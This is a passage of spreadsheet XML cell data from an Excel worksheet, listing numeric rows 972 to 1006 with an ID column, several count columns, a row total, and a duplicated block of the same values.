      <c r="Q972" s="8">
        <v>19</v>
      </c>
    </row>
    <row r="973" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A973" s="7">
        <v>2597</v>
      </c>
      <c r="B973" s="8">
        <v>26</v>
      </c>
      <c r="C973" s="8">
        <v>1</v>
      </c>
      <c r="D973" s="8">
        <v>20</v>
      </c>
      <c r="E973" s="8">
        <v>3</v>
      </c>
      <c r="F973" s="8">
        <v>23</v>
      </c>
      <c r="G973" s="8">
        <v>10</v>
      </c>
      <c r="H973" s="8">
        <v>83</v>
      </c>
      <c r="K973" s="7">
        <v>2597</v>
      </c>
      <c r="L973" s="8">
        <v>26</v>
      </c>
      <c r="M973" s="8">
        <v>1</v>
      </c>
      <c r="N973" s="8">
        <v>20</v>
      </c>
      <c r="O973" s="8">
        <v>3</v>
      </c>
      <c r="P973" s="8">
        <v>23</v>
      </c>
      <c r="Q973" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="974" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A974" s="7">
        <v>2598</v>
      </c>
      <c r="B974" s="8">
        <v>26</v>
      </c>
      <c r="C974" s="8">
        <v>1</v>
      </c>
      <c r="D974" s="8">
        <v>1</v>
      </c>
      <c r="E974" s="8">
        <v>3</v>
      </c>
      <c r="F974" s="8">
        <v>0</v>
      </c>
      <c r="G974" s="8">
        <v>0</v>
      </c>
      <c r="H974" s="8">
        <v>31</v>
      </c>
      <c r="K974" s="7">
        <v>2598</v>
      </c>
      <c r="L974" s="8">
        <v>26</v>
      </c>
      <c r="M974" s="8">
        <v>1</v>
      </c>
      <c r="N974" s="8">
        <v>1</v>
      </c>
      <c r="O974" s="8">
        <v>3</v>
      </c>
      <c r="P974" s="8">
        <v>0</v>
      </c>
      <c r="Q974" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="975" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A975" s="7">
        <v>2600</v>
      </c>
      <c r="B975" s="8">
        <v>20</v>
      </c>
      <c r="C975" s="8">
        <v>1</v>
      </c>
      <c r="D975" s="8">
        <v>0</v>
      </c>
      <c r="E975" s="8">
        <v>0</v>
      </c>
      <c r="F975" s="8">
        <v>262</v>
      </c>
      <c r="G975" s="8">
        <v>133</v>
      </c>
      <c r="H975" s="8">
        <v>416</v>
      </c>
      <c r="K975" s="7">
        <v>2600</v>
      </c>
      <c r="L975" s="8">
        <v>20</v>
      </c>
      <c r="M975" s="8">
        <v>1</v>
      </c>
      <c r="N975" s="8">
        <v>0</v>
      </c>
      <c r="O975" s="8">
        <v>0</v>
      </c>
      <c r="P975" s="8">
        <v>262</v>
      </c>
      <c r="Q975" s="8">
        <v>133</v>
      </c>
    </row>
    <row r="976" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A976" s="7">
        <v>2601</v>
      </c>
      <c r="B976" s="8">
        <v>6</v>
      </c>
      <c r="C976" s="8">
        <v>1</v>
      </c>
      <c r="D976" s="8">
        <v>0</v>
      </c>
      <c r="E976" s="8">
        <v>1</v>
      </c>
      <c r="F976" s="8">
        <v>1</v>
      </c>
      <c r="G976" s="8">
        <v>4</v>
      </c>
      <c r="H976" s="8">
        <v>13</v>
      </c>
      <c r="K976" s="7">
        <v>2601</v>
      </c>
      <c r="L976" s="8">
        <v>6</v>
      </c>
      <c r="M976" s="8">
        <v>1</v>
      </c>
      <c r="N976" s="8">
        <v>0</v>
      </c>
      <c r="O976" s="8">
        <v>1</v>
      </c>
      <c r="P976" s="8">
        <v>1</v>
      </c>
      <c r="Q976" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="977" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A977" s="7">
        <v>2602</v>
      </c>
      <c r="B977" s="8">
        <v>30</v>
      </c>
      <c r="C977" s="8">
        <v>2</v>
      </c>
      <c r="D977" s="8">
        <v>5</v>
      </c>
      <c r="E977" s="8">
        <v>0</v>
      </c>
      <c r="F977" s="8">
        <v>6</v>
      </c>
      <c r="G977" s="8">
        <v>0</v>
      </c>
      <c r="H977" s="8">
        <v>43</v>
      </c>
      <c r="K977" s="7">
        <v>2602</v>
      </c>
      <c r="L977" s="8">
        <v>30</v>
      </c>
      <c r="M977" s="8">
        <v>2</v>
      </c>
      <c r="N977" s="8">
        <v>5</v>
      </c>
      <c r="O977" s="8">
        <v>0</v>
      </c>
      <c r="P977" s="8">
        <v>6</v>
      </c>
      <c r="Q977" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="978" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A978" s="7">
        <v>2604</v>
      </c>
      <c r="B978" s="8">
        <v>25</v>
      </c>
      <c r="C978" s="8">
        <v>0</v>
      </c>
      <c r="D978" s="8">
        <v>3</v>
      </c>
      <c r="E978" s="8">
        <v>10</v>
      </c>
      <c r="F978" s="8">
        <v>12</v>
      </c>
      <c r="G978" s="8">
        <v>5</v>
      </c>
      <c r="H978" s="8">
        <v>55</v>
      </c>
      <c r="K978" s="7">
        <v>2604</v>
      </c>
      <c r="L978" s="8">
        <v>25</v>
      </c>
      <c r="M978" s="8">
        <v>0</v>
      </c>
      <c r="N978" s="8">
        <v>3</v>
      </c>
      <c r="O978" s="8">
        <v>10</v>
      </c>
      <c r="P978" s="8">
        <v>12</v>
      </c>
      <c r="Q978" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="979" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A979" s="7">
        <v>2605</v>
      </c>
      <c r="B979" s="8">
        <v>25</v>
      </c>
      <c r="C979" s="8">
        <v>1</v>
      </c>
      <c r="D979" s="8">
        <v>0</v>
      </c>
      <c r="E979" s="8">
        <v>0</v>
      </c>
      <c r="F979" s="8">
        <v>5</v>
      </c>
      <c r="G979" s="8">
        <v>5</v>
      </c>
      <c r="H979" s="8">
        <v>36</v>
      </c>
      <c r="K979" s="7">
        <v>2605</v>
      </c>
      <c r="L979" s="8">
        <v>25</v>
      </c>
      <c r="M979" s="8">
        <v>1</v>
      </c>
      <c r="N979" s="8">
        <v>0</v>
      </c>
      <c r="O979" s="8">
        <v>0</v>
      </c>
      <c r="P979" s="8">
        <v>5</v>
      </c>
      <c r="Q979" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="980" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A980" s="7">
        <v>2607</v>
      </c>
      <c r="B980" s="8">
        <v>26</v>
      </c>
      <c r="C980" s="8">
        <v>0</v>
      </c>
      <c r="D980" s="8">
        <v>10</v>
      </c>
      <c r="E980" s="8">
        <v>0</v>
      </c>
      <c r="F980" s="8">
        <v>16</v>
      </c>
      <c r="G980" s="8">
        <v>6</v>
      </c>
      <c r="H980" s="8">
        <v>58</v>
      </c>
      <c r="K980" s="7">
        <v>2607</v>
      </c>
      <c r="L980" s="8">
        <v>26</v>
      </c>
      <c r="M980" s="8">
        <v>0</v>
      </c>
      <c r="N980" s="8">
        <v>10</v>
      </c>
      <c r="O980" s="8">
        <v>0</v>
      </c>
      <c r="P980" s="8">
        <v>16</v>
      </c>
      <c r="Q980" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="981" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A981" s="7">
        <v>2608</v>
      </c>
      <c r="B981" s="8">
        <v>25</v>
      </c>
      <c r="C981" s="8">
        <v>1</v>
      </c>
      <c r="D981" s="8">
        <v>96</v>
      </c>
      <c r="E981" s="8">
        <v>778</v>
      </c>
      <c r="F981" s="8">
        <v>238</v>
      </c>
      <c r="G981" s="8">
        <v>781</v>
      </c>
      <c r="H981" s="8">
        <v>1919</v>
      </c>
      <c r="K981" s="7">
        <v>2608</v>
      </c>
      <c r="L981" s="8">
        <v>25</v>
      </c>
      <c r="M981" s="8">
        <v>1</v>
      </c>
      <c r="N981" s="8">
        <v>96</v>
      </c>
      <c r="O981" s="8">
        <v>778</v>
      </c>
      <c r="P981" s="8">
        <v>238</v>
      </c>
      <c r="Q981" s="8">
        <v>781</v>
      </c>
    </row>
    <row r="982" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A982" s="7">
        <v>2609</v>
      </c>
      <c r="B982" s="8">
        <v>24</v>
      </c>
      <c r="C982" s="8">
        <v>1</v>
      </c>
      <c r="D982" s="8">
        <v>40</v>
      </c>
      <c r="E982" s="8">
        <v>25</v>
      </c>
      <c r="F982" s="8">
        <v>12</v>
      </c>
      <c r="G982" s="8">
        <v>5</v>
      </c>
      <c r="H982" s="8">
        <v>107</v>
      </c>
      <c r="K982" s="7">
        <v>2609</v>
      </c>
      <c r="L982" s="8">
        <v>24</v>
      </c>
      <c r="M982" s="8">
        <v>1</v>
      </c>
      <c r="N982" s="8">
        <v>40</v>
      </c>
      <c r="O982" s="8">
        <v>25</v>
      </c>
      <c r="P982" s="8">
        <v>12</v>
      </c>
      <c r="Q982" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="983" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A983" s="7">
        <v>2610</v>
      </c>
      <c r="B983" s="8">
        <v>26</v>
      </c>
      <c r="C983" s="8">
        <v>0</v>
      </c>
      <c r="D983" s="8">
        <v>0</v>
      </c>
      <c r="E983" s="8">
        <v>0</v>
      </c>
      <c r="F983" s="8">
        <v>3</v>
      </c>
      <c r="G983" s="8">
        <v>0</v>
      </c>
      <c r="H983" s="8">
        <v>29</v>
      </c>
      <c r="K983" s="7">
        <v>2610</v>
      </c>
      <c r="L983" s="8">
        <v>26</v>
      </c>
      <c r="M983" s="8">
        <v>0</v>
      </c>
      <c r="N983" s="8">
        <v>0</v>
      </c>
      <c r="O983" s="8">
        <v>0</v>
      </c>
      <c r="P983" s="8">
        <v>3</v>
      </c>
      <c r="Q983" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="984" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A984" s="7">
        <v>2611</v>
      </c>
      <c r="B984" s="8">
        <v>25</v>
      </c>
      <c r="C984" s="8">
        <v>1</v>
      </c>
      <c r="D984" s="8">
        <v>20</v>
      </c>
      <c r="E984" s="8">
        <v>5</v>
      </c>
      <c r="F984" s="8">
        <v>3</v>
      </c>
      <c r="G984" s="8">
        <v>4</v>
      </c>
      <c r="H984" s="8">
        <v>58</v>
      </c>
      <c r="K984" s="7">
        <v>2611</v>
      </c>
      <c r="L984" s="8">
        <v>25</v>
      </c>
      <c r="M984" s="8">
        <v>1</v>
      </c>
      <c r="N984" s="8">
        <v>20</v>
      </c>
      <c r="O984" s="8">
        <v>5</v>
      </c>
      <c r="P984" s="8">
        <v>3</v>
      </c>
      <c r="Q984" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="985" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A985" s="7">
        <v>2613</v>
      </c>
      <c r="B985" s="8">
        <v>5</v>
      </c>
      <c r="C985" s="8">
        <v>1</v>
      </c>
      <c r="D985" s="8">
        <v>8</v>
      </c>
      <c r="E985" s="8">
        <v>14</v>
      </c>
      <c r="F985" s="8">
        <v>3</v>
      </c>
      <c r="G985" s="8">
        <v>0</v>
      </c>
      <c r="H985" s="8">
        <v>31</v>
      </c>
      <c r="K985" s="7">
        <v>2613</v>
      </c>
      <c r="L985" s="8">
        <v>5</v>
      </c>
      <c r="M985" s="8">
        <v>1</v>
      </c>
      <c r="N985" s="8">
        <v>8</v>
      </c>
      <c r="O985" s="8">
        <v>14</v>
      </c>
      <c r="P985" s="8">
        <v>3</v>
      </c>
      <c r="Q985" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="986" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A986" s="7">
        <v>2615</v>
      </c>
      <c r="B986" s="8">
        <v>30</v>
      </c>
      <c r="C986" s="8">
        <v>0</v>
      </c>
      <c r="D986" s="8">
        <v>5</v>
      </c>
      <c r="E986" s="8">
        <v>5</v>
      </c>
      <c r="F986" s="8">
        <v>3</v>
      </c>
      <c r="G986" s="8">
        <v>523</v>
      </c>
      <c r="H986" s="8">
        <v>566</v>
      </c>
      <c r="K986" s="7">
        <v>2615</v>
      </c>
      <c r="L986" s="8">
        <v>30</v>
      </c>
      <c r="M986" s="8">
        <v>0</v>
      </c>
      <c r="N986" s="8">
        <v>5</v>
      </c>
      <c r="O986" s="8">
        <v>5</v>
      </c>
      <c r="P986" s="8">
        <v>3</v>
      </c>
      <c r="Q986" s="8">
        <v>523</v>
      </c>
    </row>
    <row r="987" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A987" s="7">
        <v>2616</v>
      </c>
      <c r="B987" s="8">
        <v>25</v>
      </c>
      <c r="C987" s="8">
        <v>1</v>
      </c>
      <c r="D987" s="8">
        <v>0</v>
      </c>
      <c r="E987" s="8">
        <v>0</v>
      </c>
      <c r="F987" s="8">
        <v>3</v>
      </c>
      <c r="G987" s="8">
        <v>1</v>
      </c>
      <c r="H987" s="8">
        <v>30</v>
      </c>
      <c r="K987" s="7">
        <v>2616</v>
      </c>
      <c r="L987" s="8">
        <v>25</v>
      </c>
      <c r="M987" s="8">
        <v>1</v>
      </c>
      <c r="N987" s="8">
        <v>0</v>
      </c>
      <c r="O987" s="8">
        <v>0</v>
      </c>
      <c r="P987" s="8">
        <v>3</v>
      </c>
      <c r="Q987" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="988" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A988" s="7">
        <v>2617</v>
      </c>
      <c r="B988" s="8">
        <v>6</v>
      </c>
      <c r="C988" s="8">
        <v>0</v>
      </c>
      <c r="D988" s="8">
        <v>0</v>
      </c>
      <c r="E988" s="8">
        <v>0</v>
      </c>
      <c r="F988" s="8">
        <v>10</v>
      </c>
      <c r="G988" s="8">
        <v>10</v>
      </c>
      <c r="H988" s="8">
        <v>26</v>
      </c>
      <c r="K988" s="7">
        <v>2617</v>
      </c>
      <c r="L988" s="8">
        <v>6</v>
      </c>
      <c r="M988" s="8">
        <v>0</v>
      </c>
      <c r="N988" s="8">
        <v>0</v>
      </c>
      <c r="O988" s="8">
        <v>0</v>
      </c>
      <c r="P988" s="8">
        <v>10</v>
      </c>
      <c r="Q988" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="989" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A989" s="7">
        <v>2618</v>
      </c>
      <c r="B989" s="8">
        <v>360</v>
      </c>
      <c r="C989" s="8">
        <v>0</v>
      </c>
      <c r="D989" s="8">
        <v>5</v>
      </c>
      <c r="E989" s="8">
        <v>10</v>
      </c>
      <c r="F989" s="8">
        <v>0</v>
      </c>
      <c r="G989" s="8">
        <v>0</v>
      </c>
      <c r="H989" s="8">
        <v>375</v>
      </c>
      <c r="K989" s="7">
        <v>2618</v>
      </c>
      <c r="L989" s="8">
        <v>360</v>
      </c>
      <c r="M989" s="8">
        <v>0</v>
      </c>
      <c r="N989" s="8">
        <v>5</v>
      </c>
      <c r="O989" s="8">
        <v>10</v>
      </c>
      <c r="P989" s="8">
        <v>0</v>
      </c>
      <c r="Q989" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="990" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A990" s="7">
        <v>2619</v>
      </c>
      <c r="B990" s="8">
        <v>20</v>
      </c>
      <c r="C990" s="8">
        <v>1</v>
      </c>
      <c r="D990" s="8">
        <v>5</v>
      </c>
      <c r="E990" s="8">
        <v>5</v>
      </c>
      <c r="F990" s="8">
        <v>3</v>
      </c>
      <c r="G990" s="8">
        <v>2</v>
      </c>
      <c r="H990" s="8">
        <v>36</v>
      </c>
      <c r="K990" s="7">
        <v>2619</v>
      </c>
      <c r="L990" s="8">
        <v>20</v>
      </c>
      <c r="M990" s="8">
        <v>1</v>
      </c>
      <c r="N990" s="8">
        <v>5</v>
      </c>
      <c r="O990" s="8">
        <v>5</v>
      </c>
      <c r="P990" s="8">
        <v>3</v>
      </c>
      <c r="Q990" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="991" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A991" s="7">
        <v>2620</v>
      </c>
      <c r="B991" s="8">
        <v>26</v>
      </c>
      <c r="C991" s="8">
        <v>1</v>
      </c>
      <c r="D991" s="8">
        <v>4</v>
      </c>
      <c r="E991" s="8">
        <v>10</v>
      </c>
      <c r="F991" s="8">
        <v>14</v>
      </c>
      <c r="G991" s="8">
        <v>28</v>
      </c>
      <c r="H991" s="8">
        <v>83</v>
      </c>
      <c r="K991" s="7">
        <v>2620</v>
      </c>
      <c r="L991" s="8">
        <v>26</v>
      </c>
      <c r="M991" s="8">
        <v>1</v>
      </c>
      <c r="N991" s="8">
        <v>4</v>
      </c>
      <c r="O991" s="8">
        <v>10</v>
      </c>
      <c r="P991" s="8">
        <v>14</v>
      </c>
      <c r="Q991" s="8">
        <v>28</v>
      </c>
    </row>
    <row r="992" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A992" s="7">
        <v>2621</v>
      </c>
      <c r="B992" s="8">
        <v>24</v>
      </c>
      <c r="C992" s="8">
        <v>3</v>
      </c>
      <c r="D992" s="8">
        <v>83</v>
      </c>
      <c r="E992" s="8">
        <v>64</v>
      </c>
      <c r="F992" s="8">
        <v>33</v>
      </c>
      <c r="G992" s="8">
        <v>15</v>
      </c>
      <c r="H992" s="8">
        <v>222</v>
      </c>
      <c r="K992" s="7">
        <v>2621</v>
      </c>
      <c r="L992" s="8">
        <v>24</v>
      </c>
      <c r="M992" s="8">
        <v>3</v>
      </c>
      <c r="N992" s="8">
        <v>83</v>
      </c>
      <c r="O992" s="8">
        <v>64</v>
      </c>
      <c r="P992" s="8">
        <v>33</v>
      </c>
      <c r="Q992" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="993" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A993" s="7">
        <v>2622</v>
      </c>
      <c r="B993" s="8">
        <v>0</v>
      </c>
      <c r="C993" s="8">
        <v>0</v>
      </c>
      <c r="D993" s="8">
        <v>0</v>
      </c>
      <c r="E993" s="8">
        <v>0</v>
      </c>
      <c r="F993" s="8">
        <v>6</v>
      </c>
      <c r="G993" s="8">
        <v>2</v>
      </c>
      <c r="H993" s="8">
        <v>8</v>
      </c>
      <c r="K993" s="7">
        <v>2622</v>
      </c>
      <c r="L993" s="8">
        <v>0</v>
      </c>
      <c r="M993" s="8">
        <v>0</v>
      </c>
      <c r="N993" s="8">
        <v>0</v>
      </c>
      <c r="O993" s="8">
        <v>0</v>
      </c>
      <c r="P993" s="8">
        <v>6</v>
      </c>
      <c r="Q993" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="994" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A994" s="7">
        <v>2624</v>
      </c>
      <c r="B994" s="8">
        <v>25</v>
      </c>
      <c r="C994" s="8">
        <v>1</v>
      </c>
      <c r="D994" s="8">
        <v>1</v>
      </c>
      <c r="E994" s="8">
        <v>6</v>
      </c>
      <c r="F994" s="8">
        <v>1</v>
      </c>
      <c r="G994" s="8">
        <v>1</v>
      </c>
      <c r="H994" s="8">
        <v>35</v>
      </c>
      <c r="K994" s="7">
        <v>2624</v>
      </c>
      <c r="L994" s="8">
        <v>25</v>
      </c>
      <c r="M994" s="8">
        <v>1</v>
      </c>
      <c r="N994" s="8">
        <v>1</v>
      </c>
      <c r="O994" s="8">
        <v>6</v>
      </c>
      <c r="P994" s="8">
        <v>1</v>
      </c>
      <c r="Q994" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="995" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A995" s="7">
        <v>2625</v>
      </c>
      <c r="B995" s="8">
        <v>30</v>
      </c>
      <c r="C995" s="8">
        <v>1</v>
      </c>
      <c r="D995" s="8">
        <v>10</v>
      </c>
      <c r="E995" s="8">
        <v>0</v>
      </c>
      <c r="F995" s="8">
        <v>2</v>
      </c>
      <c r="G995" s="8">
        <v>1</v>
      </c>
      <c r="H995" s="8">
        <v>44</v>
      </c>
      <c r="K995" s="7">
        <v>2625</v>
      </c>
      <c r="L995" s="8">
        <v>30</v>
      </c>
      <c r="M995" s="8">
        <v>1</v>
      </c>
      <c r="N995" s="8">
        <v>10</v>
      </c>
      <c r="O995" s="8">
        <v>0</v>
      </c>
      <c r="P995" s="8">
        <v>2</v>
      </c>
      <c r="Q995" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="996" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A996" s="7">
        <v>2629</v>
      </c>
      <c r="B996" s="8">
        <v>25</v>
      </c>
      <c r="C996" s="8">
        <v>1</v>
      </c>
      <c r="D996" s="8">
        <v>3</v>
      </c>
      <c r="E996" s="8">
        <v>5</v>
      </c>
      <c r="F996" s="8">
        <v>6</v>
      </c>
      <c r="G996" s="8">
        <v>5</v>
      </c>
      <c r="H996" s="8">
        <v>45</v>
      </c>
      <c r="K996" s="7">
        <v>2629</v>
      </c>
      <c r="L996" s="8">
        <v>25</v>
      </c>
      <c r="M996" s="8">
        <v>1</v>
      </c>
      <c r="N996" s="8">
        <v>3</v>
      </c>
      <c r="O996" s="8">
        <v>5</v>
      </c>
      <c r="P996" s="8">
        <v>6</v>
      </c>
      <c r="Q996" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="997" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A997" s="7">
        <v>2632</v>
      </c>
      <c r="B997" s="8">
        <v>6</v>
      </c>
      <c r="C997" s="8">
        <v>1</v>
      </c>
      <c r="D997" s="8">
        <v>0</v>
      </c>
      <c r="E997" s="8">
        <v>0</v>
      </c>
      <c r="F997" s="8">
        <v>7</v>
      </c>
      <c r="G997" s="8">
        <v>0</v>
      </c>
      <c r="H997" s="8">
        <v>14</v>
      </c>
      <c r="K997" s="7">
        <v>2632</v>
      </c>
      <c r="L997" s="8">
        <v>6</v>
      </c>
      <c r="M997" s="8">
        <v>1</v>
      </c>
      <c r="N997" s="8">
        <v>0</v>
      </c>
      <c r="O997" s="8">
        <v>0</v>
      </c>
      <c r="P997" s="8">
        <v>7</v>
      </c>
      <c r="Q997" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="998" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A998" s="7">
        <v>2633</v>
      </c>
      <c r="B998" s="8">
        <v>24</v>
      </c>
      <c r="C998" s="8">
        <v>2</v>
      </c>
      <c r="D998" s="8">
        <v>5</v>
      </c>
      <c r="E998" s="8">
        <v>0</v>
      </c>
      <c r="F998" s="8">
        <v>5</v>
      </c>
      <c r="G998" s="8">
        <v>1</v>
      </c>
      <c r="H998" s="8">
        <v>37</v>
      </c>
      <c r="K998" s="7">
        <v>2633</v>
      </c>
      <c r="L998" s="8">
        <v>24</v>
      </c>
      <c r="M998" s="8">
        <v>2</v>
      </c>
      <c r="N998" s="8">
        <v>5</v>
      </c>
      <c r="O998" s="8">
        <v>0</v>
      </c>
      <c r="P998" s="8">
        <v>5</v>
      </c>
      <c r="Q998" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="999" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A999" s="7">
        <v>2636</v>
      </c>
      <c r="B999" s="8">
        <v>26</v>
      </c>
      <c r="C999" s="8">
        <v>7</v>
      </c>
      <c r="D999" s="8">
        <v>5</v>
      </c>
      <c r="E999" s="8">
        <v>0</v>
      </c>
      <c r="F999" s="8">
        <v>2</v>
      </c>
      <c r="G999" s="8">
        <v>2</v>
      </c>
      <c r="H999" s="8">
        <v>42</v>
      </c>
      <c r="K999" s="7">
        <v>2636</v>
      </c>
      <c r="L999" s="8">
        <v>26</v>
      </c>
      <c r="M999" s="8">
        <v>7</v>
      </c>
      <c r="N999" s="8">
        <v>5</v>
      </c>
      <c r="O999" s="8">
        <v>0</v>
      </c>
      <c r="P999" s="8">
        <v>2</v>
      </c>
      <c r="Q999" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1000" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1000" s="7">
        <v>2637</v>
      </c>
      <c r="B1000" s="8">
        <v>25</v>
      </c>
      <c r="C1000" s="8">
        <v>1</v>
      </c>
      <c r="D1000" s="8">
        <v>10</v>
      </c>
      <c r="E1000" s="8">
        <v>30</v>
      </c>
      <c r="F1000" s="8">
        <v>17</v>
      </c>
      <c r="G1000" s="8">
        <v>8</v>
      </c>
      <c r="H1000" s="8">
        <v>91</v>
      </c>
      <c r="K1000" s="7">
        <v>2637</v>
      </c>
      <c r="L1000" s="8">
        <v>25</v>
      </c>
      <c r="M1000" s="8">
        <v>1</v>
      </c>
      <c r="N1000" s="8">
        <v>10</v>
      </c>
      <c r="O1000" s="8">
        <v>30</v>
      </c>
      <c r="P1000" s="8">
        <v>17</v>
      </c>
      <c r="Q1000" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1001" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1001" s="7">
        <v>2639</v>
      </c>
      <c r="B1001" s="8">
        <v>30</v>
      </c>
      <c r="C1001" s="8">
        <v>0</v>
      </c>
      <c r="D1001" s="8">
        <v>7</v>
      </c>
      <c r="E1001" s="8">
        <v>0</v>
      </c>
      <c r="F1001" s="8">
        <v>6</v>
      </c>
      <c r="G1001" s="8">
        <v>0</v>
      </c>
      <c r="H1001" s="8">
        <v>43</v>
      </c>
      <c r="K1001" s="7">
        <v>2639</v>
      </c>
      <c r="L1001" s="8">
        <v>30</v>
      </c>
      <c r="M1001" s="8">
        <v>0</v>
      </c>
      <c r="N1001" s="8">
        <v>7</v>
      </c>
      <c r="O1001" s="8">
        <v>0</v>
      </c>
      <c r="P1001" s="8">
        <v>6</v>
      </c>
      <c r="Q1001" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1002" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1002" s="7">
        <v>2641</v>
      </c>
      <c r="B1002" s="8">
        <v>26</v>
      </c>
      <c r="C1002" s="8">
        <v>1</v>
      </c>
      <c r="D1002" s="8">
        <v>7</v>
      </c>
      <c r="E1002" s="8">
        <v>13</v>
      </c>
      <c r="F1002" s="8">
        <v>9</v>
      </c>
      <c r="G1002" s="8">
        <v>6</v>
      </c>
      <c r="H1002" s="8">
        <v>62</v>
      </c>
      <c r="K1002" s="7">
        <v>2641</v>
      </c>
      <c r="L1002" s="8">
        <v>26</v>
      </c>
      <c r="M1002" s="8">
        <v>1</v>
      </c>
      <c r="N1002" s="8">
        <v>7</v>
      </c>
      <c r="O1002" s="8">
        <v>13</v>
      </c>
      <c r="P1002" s="8">
        <v>9</v>
      </c>
      <c r="Q1002" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1003" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1003" s="7">
        <v>2647</v>
      </c>
      <c r="B1003" s="8">
        <v>6</v>
      </c>
      <c r="C1003" s="8">
        <v>1</v>
      </c>
      <c r="D1003" s="8">
        <v>2</v>
      </c>
      <c r="E1003" s="8">
        <v>0</v>
      </c>
      <c r="F1003" s="8">
        <v>4</v>
      </c>
      <c r="G1003" s="8">
        <v>1</v>
      </c>
      <c r="H1003" s="8">
        <v>14</v>
      </c>
      <c r="K1003" s="7">
        <v>2647</v>
      </c>
      <c r="L1003" s="8">
        <v>6</v>
      </c>
      <c r="M1003" s="8">
        <v>1</v>
      </c>
      <c r="N1003" s="8">
        <v>2</v>
      </c>
      <c r="O1003" s="8">
        <v>0</v>
      </c>
      <c r="P1003" s="8">
        <v>4</v>
      </c>
      <c r="Q1003" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1004" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1004" s="7">
        <v>2649</v>
      </c>
      <c r="B1004" s="8">
        <v>26</v>
      </c>
      <c r="C1004" s="8">
        <v>1</v>
      </c>
      <c r="D1004" s="8">
        <v>5</v>
      </c>
      <c r="E1004" s="8">
        <v>98</v>
      </c>
      <c r="F1004" s="8">
        <v>15</v>
      </c>
      <c r="G1004" s="8">
        <v>3</v>
      </c>
      <c r="H1004" s="8">
        <v>148</v>
      </c>
      <c r="K1004" s="7">
        <v>2649</v>
      </c>
      <c r="L1004" s="8">
        <v>26</v>
      </c>
      <c r="M1004" s="8">
        <v>1</v>
      </c>
      <c r="N1004" s="8">
        <v>5</v>
      </c>
      <c r="O1004" s="8">
        <v>98</v>
      </c>
      <c r="P1004" s="8">
        <v>15</v>
      </c>
      <c r="Q1004" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1005" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1005" s="7">
        <v>2653</v>
      </c>
      <c r="B1005" s="8">
        <v>0</v>
      </c>
      <c r="C1005" s="8">
        <v>0</v>
      </c>
      <c r="D1005" s="8">
        <v>0</v>
      </c>
      <c r="E1005" s="8">
        <v>4</v>
      </c>
      <c r="F1005" s="8">
        <v>2</v>
      </c>
      <c r="G1005" s="8">
        <v>0</v>
      </c>
      <c r="H1005" s="8">
        <v>6</v>
      </c>
      <c r="K1005" s="7">
        <v>2653</v>
      </c>
      <c r="L1005" s="8">
        <v>0</v>
      </c>
      <c r="M1005" s="8">
        <v>0</v>
      </c>
      <c r="N1005" s="8">
        <v>0</v>
      </c>
      <c r="O1005" s="8">
        <v>4</v>
      </c>
      <c r="P1005" s="8">
        <v>2</v>
      </c>
      <c r="Q1005" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1006" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1006" s="7">
        <v>2655</v>
      </c>
      <c r="B1006" s="8">
        <v>24</v>
      </c>
      <c r="C1006" s="8">
        <v>1</v>
      </c>
      <c r="D1006" s="8">
        <v>0</v>
      </c>
      <c r="E1006" s="8">
        <v>0</v>
      </c>
      <c r="F1006" s="8">
        <v>20</v>
      </c>
      <c r="G1006" s="8">
        <v>3</v>
      </c>
      <c r="H1006" s="8">
        <v>48</v>
